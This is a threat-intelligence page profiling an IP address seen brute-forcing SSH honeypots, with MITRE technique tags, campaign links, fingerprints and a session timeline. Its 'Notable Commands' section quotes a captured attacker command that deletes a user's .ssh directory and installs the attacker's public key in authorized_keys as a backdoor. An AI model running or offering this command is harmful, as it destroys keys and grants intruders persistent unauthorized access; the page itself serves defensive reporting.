IntrusionLabs / threat intelligence

Sign in

← Back to feed

113.194.203.31

Threat Confidence

51%

Location

🇨🇳 CN

ASN

AS4837 · CHINA UNICOM China169 Backbone

Cloud Provider

—

Total Events

69

Above average by volume

Agent Count

1

First / Last Seen

2026-03-07 15:41 — 2026-04-23 18:43

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Reconnaissance

T1595 T1595.002

Initial Access

T1078

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Discovery

T1046

Command and Control

T1105

External Corroboration

Not flagged by any external feeds

Campaigns

HASSH 03a80b21afa8… — SSH-2.0-libssh_0.11.1 (529 IPs, 65 countries) HASSH Active high 🇨🇳 CN

529 IPs 203094 events

2026-02-27 — ongoing · 529 IPs are running an identical SSH client (HASSH fingerprint 03a80b21afa8…). Top network: China Telecom Group (AS4811). Geographic …

AS4837 CHINA UNICOM China169 Backbone ASN Active medium 🇨🇳 CN

31 IPs 2291 events

2026-02-16 — ongoing · 31 IPs from the same network (CHINA UNICOM China169 Backbone, AS4837) were active during overlapping time periods. Temporal …

Session Forensics

scanner ×18 malware_dropper ×1 credential_probe ×1 opportunistic_bruter ×1

Sessions

21 (2 with login)

Avg Depth Score

0.21

Commands Executed

3

Files Downloaded

1

Notable Commands

cd ~; chattr -ia .ssh; lockr -ia .ssh
lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Fingerprints

HASSH

03a80b21afa810682a776a7d42e5e6fb

SSH Client

SSH-2.0-libssh_0.11.1

Evidence Timeline

Scanner 2f72bbd5b28c w4m_singapore_01 · 2026-04-23 18:38

15%

Loading events...

Scanner c195b247ae51 w4m_singapore_01 · 2026-04-23 18:37

15%

Loading events...

Scanner 1339cca05d7f w4m_singapore_01 · 2026-04-23 18:39

15%

Loading events...

Opportunistic Bruter 8e9a25b8081f w4m_singapore_01 · 2026-04-23 18:38

1 50%

Loading events...

Scanner 69fadbf8d09d w4m_singapore_01 · 2026-04-23 18:36

15%

Loading events...

Scanner 5462039759f6 w4m_singapore_01 · 2026-04-23 18:38

15%

Loading events...

Scanner 912192f6f7c3 w4m_singapore_01 · 2026-04-23 18:37

15%

Loading events...

Scanner e866ee760695 w4m_singapore_01 · 2026-04-23 18:37

15%

Loading events...

Scanner 35997e7f7c25 w4m_singapore_01 · 2026-04-23 18:33

15%

Loading events...

Scanner d46ca5aaa2ac w4m_singapore_01 · 2026-04-23 18:30

15%

Loading events...

Malware Dropper 46f43fe4a7aa w4m_singapore_01 · 2026-04-23 18:30

3 1 1 100%

Loading events...

Scanner 29e1c783db03 w4m_singapore_01 · 2026-04-23 18:28

15%

Loading events...

Scanner 363d7b92955a w4m_singapore_01 · 2026-04-23 18:29

15%

Loading events...

Scanner 5b384631bcbd w4m_singapore_01 · 2026-04-23 18:29

15%

Loading events...

Credential Probe 3d58edfbc342 w4m_singapore_01 · 2026-04-23 18:20

1 20%

Loading events...

Scanner f1a609374d05 w4m_singapore_01 · 2026-04-19 20:07

15%

Loading events...

Scanner f19e1290a9c6 w4m_singapore_01 · 2026-04-14 08:44

15%

Loading events...

Scanner e7e6c23c8f3b w4m_singapore_01 · 2026-04-13 06:10

15%

Loading events...

Scanner ea4071154ab3 w4m_singapore_01 · 2026-04-04 15:42

15%

Loading events...

Scanner ae245cc6256d w4m_singapore_01 · 2026-03-13 21:30

15%

Loading events...

Scanner feca8eabaade w4m_singapore_01 · 2026-03-07 15:41

15%

Loading events...